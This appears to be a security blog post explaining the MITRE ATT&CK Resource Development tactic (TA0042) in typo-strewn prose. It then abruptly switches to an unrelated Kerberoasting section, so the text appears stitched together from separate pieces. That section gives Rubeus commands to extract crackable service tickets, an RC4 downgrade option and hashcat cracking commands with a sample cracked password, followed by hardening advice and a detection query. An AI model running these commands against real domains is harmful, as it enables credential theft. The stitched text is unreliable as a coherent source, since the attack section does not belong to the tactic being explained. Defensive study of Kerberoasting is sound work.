TA0042 - Resource Development Tactics Dissected
Introduction to MITRE ATT&CK - Resource Development (TA0042)
In the MITRE ATT&CK model, Resource Development (TA0042) represents the phase where an adversary prepares the infrastructure, capabilities, and operational assets required to execute an intrusion. While reconnaissance focuses on understanding the target, resource development is about building the tools, identities, and platforms needed to act on that gathered intelligence. This phase often occurs entirey outside the victim environment, making it difficult to detect, yet it is one of the most critical stages in determining the overall success, scalability, and stealth of an attack operation.
Infrastructure Acquisition and Setup
Resource development begins with the establishment of adversary-controlled infrastructure. Adversaries acquire domains, provision severs, and configure hosting environments that will later support Command, Communications, and Control (C3), payload delivery, phishing campaigns, or data exfiltration. These resources are rarely created in a straightforward or attributable manner. Instead, adversaries employ layered obfuscation techniques such as using privacy-protected domain registrations through the use of offshore hosting providers, leveraging third-party providers, nd routing traffic through intermediary and proxied systems to mask origin. The infrastructure is often designed to appear legitimate, mimicking trusted service or blending into normal internet traffic patterns. For example, domains may be crafted to resemble the target organization or commonly used services or goods, increasing the likelihood that users will trust them during phishing or redirection scenarios.
Tooling Development and Capability Building
Parallel to infrastructure creation and establishment, adversaries develop or acquire the tooling necessary to execute their operations. This includes malware, exploit frameworks, credential harvesting kits, and post-exploitation utilities. In many cases, adversaries do not build these tools from scratch; instead, they adapt publicly available frameworks, modify existing malware families, or purchase capabilities from underground marketplaces on the dark web. The emphasis is on customization and evasion, ensuring that tools are tailored to the specific targeted environment identified during the reconnaissance phase. This may involve altering code signatures to evade antivirus detection, embedding configuration data specific to the target, or integrating communication protocols that align with the target's normal network behaviors. The result is a toolkit that is both functional and difficult to detect using standard defensive mechanisms.
Account Acquisition and Identity Preparation
Another critical component of resource development is the acquisition and preparation of accounts. Adversaries often create or obtain email accounts, social media profiles, and other digital identities that will be used to interact with the target specifically. These accounts are carefully curated to appear legitimate, sometimes maintained over long periods to establish credibility and trustworthiness. In more advanced operations, adversaries may compromise existing accounts or purchase access to aged accounts with established histories, further enhancing their authenticity and believability. These identities serve multiple purposes, from delivering phishing emails to engaging in social engineering interactions, and are often aligned with the organizational context discovered during reconnaissance. For example, an adversary targeting a specific department may create accounts that appear to belong to colleagues, vendors, or internal support staff.
Staging and Operational Testing
Staging and testing are also integral to this phase. Before launching an operation, adversaries validate their infrastructure and tools in controlled environments to ensure reliability and stealth. This may involve testing phishing templates against spam filters, verifying that Command, Communications, and Control (C3) channels are resilient and undetected, or simulating interactions with target-like systems to confirm exploit effectiveness. These tests are not arbitrary; they are informed by the intelligence gatheed during reconnaissance and are designed to replicate the exact conditions the adversary expects to encounter. By the time the operation begins, the adversary has already resolved many potential points of failure, increasing their likelihood of a smooth and successful intrusion.
Payload and Delivery Mechanism Preparation
Resource development also includes the preparation of delivery mechanisms. Phishing templates, malicious documents and attachments, exploit-laden web pages, and payload hosting systems are all crafted during this stage. These elements are often highly customized, incorporating language, branding, and contextual details specific to the target organization. The goal is to reduce suspicion and increase engagement, whether that means convincing a user to open an attachment, click a link, or provide credentials. In more advanced scenarios, adversaries may develop multi-staged delivery chains, where initial interactions lead to secondary payloads or redirections, further complicating detection and analysis for defenders.
Operational Security (OPSEC) and Defensive Resilience
An important but less visible aspect of resource development is the establishment of Operational Security (OPSEC) measures. Adversaries take deliberate steps to protect the identity of their infrastructure and identities from attribution and disruption. This includes using anonymization services, rotating infrastructure components, segmenting operations across multiple platforms, and implementing fallback mechanisms in case parts of the operation are detected and blocked. For example, an adversary may register multiple backup domains, configure redundant C3 servers, or design malware to switch communications channels if its primary path is disrupted. These calculate precautions ensure that the operation can continue even under defensive pressure, reflecting a level of planning that goes beyond simple opportunistic attacks.
Integration into Operational Framework
As resource development progresses, the adversary begins to align all components into a cohesive operational framework. Inrastructure, tools, identieis, and delivery mechanisms are integrated in a way that supports the chosen attack path. This integration is not merely technical; it is strategic. Each component is selected and configured based on its role in the broader operation, ensuring that the transition into the Initial Access phase is seamless. By the time the adversary is ready to engage the target directly, they are not improvising - they are executing a pre-planned sequence of actions that are fully supported by a well-prepared environment.
Defensive Visibility and Detection Gaps
From a defensive standpoint, resource development is particularly challenging to address as a defender because it occurs largely outisde the organization's visibility and perimeter. The infrastructure and accounts used by adversaries are often indistinguishable from legitimate resources until they are actively used in an attack; however, there are indirect indicators that can provide some insight int this phase. Monitoring newly registered domains that resemble the organization, tracking brand impersonation, and analyzing threat intelligence feeds for emerging infrastructure patterns can help identify potential threats before they are deployed. Additionally, understanding common adversarial behaviors in resource development - such as domain naming conventions, hoting patterns, and tooling reuse - can improve an organization's ability to better anticipate and mitigate forthcoming attacks.
From Preparation to Execution Capability
Ultimatly, resource development is where intent becomes capability. It transforms the insights gained during reconnaissance into tangible assets that enable action and movement. The sophistcation of this phase often relects the overall maturity of the adversary; well-resourced and highly skilled actors invest signficant time and effort into building robust, adaptable infrastructures and toolsets, while less advanced adversaries may rely on readily available resources with minimal customization. Regardless of the level of sophisitication here, the outcome is all the same: a well-prepared adversary with the means to initiate an intrusion. The quality and completeness of this preparation directly influences the effectiveness, stealth, and persistence of the attack that soon follows.
Extract Tickets with Rubeus
Rubeus is a C# toolset for Kerberos interaction and abuse. It can request and extract service tickets in a crackable format:
# Request tickets for all kerberoastable accounts Rubeus.exe kerberoast /outfile:hashes.txt # Target a specific SPN Rubeus.exe kerberoast /spn:MSSQLSvc/db01.corp.local:1433 # Use RC4 downgrade for easier cracking (noisier) Rubeus.exe kerberoast /tgtdeleg
Crack with Hashcat
# Crack Kerberos 5 TGS-REP (RC4 - type 23) hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule # Crack AES256 tickets (type 17/18 — slower) hashcat -m 19700 hashes.txt wordlist.txt --force # Check results hashcat -m 13100 hashes.txt --show $krb5tgs$23$*svc_sql$CORP.LOCAL*$...:Summer2024!
Detection & Defense
Defending against Kerberoasting requires a multi-layered approach combining preventive controls and detection mechanisms:
Preventive Controls
- Strong service account passwords: Use 25+ character randomly generated passwords for all service accounts with SPNs
- Group Managed Service Accounts (gMSA): Automatically rotate 240-character complex passwords every 30 days
- AES encryption only: Disable RC4_HMAC_MD5 via GPO to force AES256, making cracking computationally expensive
- Minimize SPNs: Audit and remove unnecessary SPNs from user accounts; use computer accounts where possible
- Privileged Access Management: Avoid assigning Domain Admin or high-privilege group memberships to service accounts
// Detect potential Kerberoasting via RC4 TGS requests SecurityEvent | where EventID == 4769 | where TicketEncryptionType == "0x17" // RC4 | where ServiceName !endswith "$" // Exclude machine accounts | summarize Count=count() by TargetUserName, IpAddress, bin(TimeGenerated, 5m) | where Count > 5